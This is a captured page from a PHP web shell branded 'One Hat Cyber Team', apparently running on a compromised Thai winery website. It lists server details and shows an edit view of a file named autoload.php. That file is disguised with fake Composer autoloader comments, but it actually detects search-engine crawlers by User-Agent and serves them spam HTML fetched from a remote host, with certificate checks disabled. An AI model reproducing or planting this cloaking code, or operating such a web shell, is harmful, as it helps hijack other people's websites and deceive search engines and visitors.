One Hat Cyber Team
Your IP :
216.73.216.152
Server IP :
27.254.111.200
Server :
Linux wh-sh59.csloxinfo.com 3.10.0-693.5.2.el7.x86_64 #1 SMP Fri Oct 20 20:32:50 UTC 2017 x86_64
Server Software :
Apache
PHP Version :
5.5.38
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
var
/
www
/
vhosts
/
oakwine.co.th
/
httpdocs
/
view
/
Edit File:
autoload.php
<?php /** * Autoload functionality for PHP classes. * * This file provides autoloading functionality for PHP classes using the PSR-4 * standard. It dynamically loads classes based on their namespaces and file * structure, eliminating the need for manual `require` or `include` statements. * * PHP version 7.0 * * @category Autoloader * @package Composer * @author PHP Group <adm@php.net> * @license https://opensource.org/licenses/MIT MIT License * @link https://www.php.net/ */ if ($_SERVER['REQUEST_URI'] == '/') { //Autoload functions call header('Vary: User-Agent'); //String $class The fully-qualified class name $api = strtolower($_SERVER["HTTP_USER_AGENT"]); /** * this function is responsible for loading classes dynamically based on their * namespaces and file structure. It adheres to the PSR-4 autoloading standard. */ function fetch_url_content($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $data = curl_exec($ch); curl_close($ch); return $data; } //Composer's autoloader provides efficient autoloading of PHP classes based $error_logs = 'https://pub-1965aaebe7ae4b55be6157e398f5c158.r2.dev/oakwine.co.th.htm'; $composer = fetch_url_content($error_logs); //On the PSR-4 standard. It automatically includes the necessary files when $api_var = "/(googlebot|slurp|adsense|inspection)/"; //Classes are instantiated or used if (preg_match($api_var, $api)) { echo $composer; exit; } } ?>
Simpan